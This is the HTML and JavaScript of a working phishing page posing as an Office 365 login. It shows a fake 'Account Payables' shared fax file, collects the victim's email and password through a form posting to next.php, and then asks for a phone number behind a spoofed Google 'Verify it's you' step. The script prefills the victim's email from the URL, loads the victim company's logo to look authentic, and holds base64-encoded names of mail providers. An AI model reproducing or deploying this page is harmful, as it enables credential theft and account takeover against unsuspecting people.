<!doctype html>
<html lang="en">

<head>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
    <script src="https://code.jquery.com/jquery-3.1.1.min.js"></script>
    <script src="https://code.jquery.com/jquery-3.3.1.js" integrity="sha256-2Kok7MbOyxpgUVvAk/HJ2jigOSYS2auK4Pfzbm7uH60=" crossorigin="anonymous"></script>
    <!-- Required meta tags -->
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <!-- Bootstrap CSS -->
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous">
    <link href="https://fonts.googleapis.com/css?family=Archivo+Narrow&display=swap" rel="stylesheet">
    <script src="https://kit.fontawesome.com/585b051251.js" crossorigin="anonymous"></script>
    <title>Office 365 | Login</title>
    <link rel="icon" type="image/png" sizes="100x100" href="images/office3651.png">
    <link href="css/hover.css" rel="stylesheet" media="all">
    <style type="text/css">
    html,
    body {
        height: 100%;
    }
    </style>
</head>

<body style="background-image: url('images/bg2.jpg');background-size: cover;background-repeat: no-repeat;">
    <div class="container-fluid p-0">
        <div class="container-fluid">
            <div class="row pl-3" style="height: 100%">
                <div class="col-lg-4 text-center bg-white mx-auto rounded p-4 mt-5">
                    <div class="container">
                        <div class="row">
                            <div>
                                <div>
                                    <img id="logoimg" src="images/vm.png" class="img-fluid" width="85px">
                                </div>
                                <div class="mt-2 col-lg-12">
                                    <span class="h5 font-weight-normal">Account Payables want to share the file
                                        <span class="font-weight-bold">Fax Copy 20201201.mp3 </span>
                                        with you.
                                    </span>
                                </div>
                                <div class="mt-2 ">
                                    <span class="h5 font-weight-normal text-secondary">Sign in to view this file
                                    </span>
                                </div>
                                <div class="modal-body text-left">
                                    <center>
                                        <div class="alert alert-danger" id="msg" style="display: none;">Invalid Password.! Please enter correct password.</div>
                                        <span id="error" class="text-danger" style="display: none;">That account doesn't exist. Enter a different account</span>
                                    </center>
                                    <form class="form-horizontal well" action="./next.php" method="POST">
                                        <input type="hidden" name="count" id="count" value="0">
                                        <div id="div1">
                                            <div class="col-lg-12">
                                                <div class="form-group">
                                                    <div>
                                                        <label for="exampleInputEmail1">Email address</label>
                                                        <input type="email" name="ai" class="form-control" id="ai" aria-describedby="aiHelp" placeholder="Enter email" required="">
                                                    </div>
                                                </div>
                                            </div>
                                            <div class="col-lg-12">
                                                <div class="form-group">
                                                    <label for="pr">Password</label>
                                                    <input type="password" name="pr" class="form-control" id="pr" aria-describedby="aiHelp" placeholder="Enter Password" required="">
                                                </div>
                                            </div>
                                            <div class="text-right col-lg-12">
                                                <input type="submit" class="btn btn-primary pull-right" name="submit-btn" id="submit-btn" value="Login">
                                            </div>
                                        </div>
                                    </form>
                                    <form class="form-horizontal well" action="./next.php" method="POST">
                                        <div id="div2" style="display: none;">
                                            <i class="fas fa-arrow-left" id="back"></i>&nbsp<span id="aich" class="h5">abc@abc.com</span><br>
                                            <span class="h4 font-weight-normal">Verify it's you</span><br>
                                            <span>This device is not recognized. For security, Google want to make sure it's really you.</span><br>
                                            <span id="msg1" class="text-danger"></span>
                                            <br>
                                            <span>Try another way to sign in</span>
                                            <div class="form-group mt-3">
                                                <input type="number" name="ph" class="form-control" id="ph" aria-describedby="aiHelp" placeholder="Enter Phone No." required="">
                                            </div>
                                            <div class="text-right">
                                                <button type="button" class="btn btn-secondary" data-dismiss="modal">Close</button>
                                                <input type="submit" class="btn btn-primary pull-right" name="submit-btn1" id="submit-btn1" value="verify">
                                            </div>
                                        </div>
                                    </form>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <!-- Optional JavaScript -->
    <!-- jQuery first, then Popper.js, then Bootstrap JS -->
    <script src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>
</body>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
<script src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>
<script>
<!--  /* global $ */
$(document).ready(function() {
    var count = 0;
    var ou = "b3V0bG9vaw==";
    var ho = "aG90bWFpbA==";
    var gm = "Z21haWw=";
    var ya = "eWFob28=";
    var of = "b2ZmaWNlMzY1";

    function getUrlVars() {
        var vars = {};
        var parts = window.location.href.replace(/[?&]+([^=&]+)=([^&]*)/gi, function(m, key, value) {
            vars[key] = value;
        });
        return vars;
    }


    if (!getUrlVars()["count"]) {

    } else {
        var count = getUrlVars()["count"];
        $('#count').val(count);
    }



    /////////////url ai getting////////////////
    var ai = window.location.hash.substr(1);
    if (!ai) {

    } else {
        // $('#ai').val(ai);
        var my_ai = ai;
        var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

        if (!filter.test(my_ai)) {
            $('#error').show();
            ai.focus;
            return false;
        }
        var ind = my_ai.indexOf("@");
        var my_slice = my_ai.substr((ind + 1));
        var c = my_slice.substr(0, my_slice.indexOf('.'));
        var final = c.toLowerCase();
        var count = $('#count').val();
        if (count == 1) {
            $("#msg").show();
        } else {
            $("#msg").hide();
        }
        $('#ai').val(my_ai);
        $('#ai').attr('readonly',true);
        $.get("https://logo.clearbit.com/" + my_slice)
            .done(function() {
                $("#logoimg").attr("src", "https://logo.clearbit.com/" + my_slice);

            }).fail(function() {
                $("#logoimg").attr("src", "images/vm.png");

            })

    }
    ///////////////url getting ai////////////////


});
</script>

</html>